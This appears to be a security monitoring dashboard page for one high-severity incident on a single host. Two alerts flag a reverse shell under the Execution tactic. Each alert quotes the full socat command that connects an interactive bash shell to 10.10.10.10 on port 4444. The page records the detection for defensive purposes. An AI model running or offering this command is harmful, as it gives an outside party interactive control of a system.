Back to list

High CINC-20251220-DCF17F8D new

Aggregate ID: aggind:b4aeee57c4b841bc95cb853f0aca95e1:4754213140

Incident Overview

Incident ID CINC-20251220-DCF17F8D
Severity High (80)
Status new
Alert Count 2
Host Count 1

Timeline

First Seen 2025-12-20 09:08:54
Last Seen 2025-12-20 09:08:54
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution
Techniques:
Command and Scripting Interpreter

Affected Hosts (1)

localhost.localdomain

Related Alerts (2)

Severity Status Hostname Description Tactic Command Line Time
High new localhost.localdomain The commands executed on this CLI are suspicious and may be related to malicious activity. Review the commands to see if they are expected. Execution bash -c socat exec:'bash -li',pty,stderr tcp:10.10.10.10:4444 12-20 09:08
Critical new localhost.localdomain A reverse shell has been detected on your host. It may provide adversaries with an interactive terminal. Check the process tree to determine if this access was expected. Execution bash -c socat exec:'bash -li',pty,stderr tcp:10.10.10.10:4444 12-20 09:08